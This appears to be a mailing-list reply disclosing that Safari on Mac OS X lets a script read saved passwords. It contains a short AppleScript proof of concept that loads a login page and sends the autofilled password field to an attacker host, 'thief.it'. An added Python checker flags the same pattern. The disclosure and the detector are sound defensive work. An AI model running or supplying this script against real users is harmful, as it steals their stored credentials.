Re: RE: Apple Safari on MacOSX may reveal user's saved passwords
Mark, you read it correctly and you're right; anyway, a malicious user at your
console should not be able to read your passwords. Also note that to steal
saved passwords it's sufficient to entice a victim to execute a malicious script
like this:
--BOF
tell application "Safari"
open location "https://www.target.com"
end tell
do shell script "/bin/sleep 10"
tell application "Safari"
do JavaScript "document.location.href='http://thief.it/steal_target?p='+document.loginform.password.value" in document 1
end tell
--EOF
I agree with you that the execution of malicious scripts can lead to
much more dangerous attacks; anyway, I consider this a vulnerability and I don't
know why Apple believes this is the correct behaviour...
Many thanks for your comment
-p
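
Added example, not part of the original message: a static check a defender could run over AppleScript text source to flag the pattern shown in the post, a Safari `do JavaScript` call that reads a form field's value and sends it to a host the script itself never opened. The function name, the regexes and the sample hosts are assumptions made for this illustration.

```python
import re

# Constructed sample in the shape of the script from the post; hosts are placeholders.
SAMPLE = '''tell application "Safari"
open location "https://www.example.com"
end tell
do shell script "/bin/sleep 10"
tell application "Safari"
do JavaScript "document.location.href='http://collector.example/s?p='+document.loginform.password.value" in document 1
end tell
'''

TELL = re.compile(r'^\s*tell application "([^"]+)"(\s+to\b)?', re.I)
END_TELL = re.compile(r'^\s*end tell\b', re.I)
OPEN_LOC = re.compile(r'open location\s+"https?://([^/"]+)', re.I)
DO_JS = re.compile(r'do JavaScript\s+"((?:[^"\\]|\\.)*)"', re.I)
READS_VALUE = re.compile(r'\.value\b')
SENDS = re.compile(r'location(\.href)?\s*=|\.src\s*=|XMLHttpRequest|fetch\s*\(', re.I)
JS_HOST = re.compile(r'https?://([^/\'"?\s]+)', re.I)

def scan_applescript(source):
    """Flag Safari 'do JavaScript' calls that read a form field value and send it elsewhere."""
    findings, tells, opened = [], [], set()
    for lineno, line in enumerate(source.splitlines(), 1):
        m = TELL.match(line)
        inline_app = None
        if m and m.group(2):          # one-line form: tell application "X" to ...
            inline_app = m.group(1).lower()
        elif m:                       # block form: push onto the tell stack
            tells.append(m.group(1).lower())
            continue
        elif END_TELL.match(line):
            if tells:
                tells.pop()
            continue
        app = inline_app or (tells[-1] if tells else None)
        if app != "safari":
            continue
        loc = OPEN_LOC.search(line)
        if loc:                       # remember hosts the script itself navigates to
            opened.add(loc.group(1).lower())
        js = DO_JS.search(line)
        if js and READS_VALUE.search(js.group(1)) and SENDS.search(js.group(1)):
            hosts = {h.lower() for h in JS_HOST.findall(js.group(1))}
            findings.append({"line": lineno, "foreign_hosts": sorted(hosts - opened)})
    return findings
```

The check works on text source only and is a heuristic: it reports the line of the `do JavaScript` statement and any destination hosts that differ from the pages the script opened.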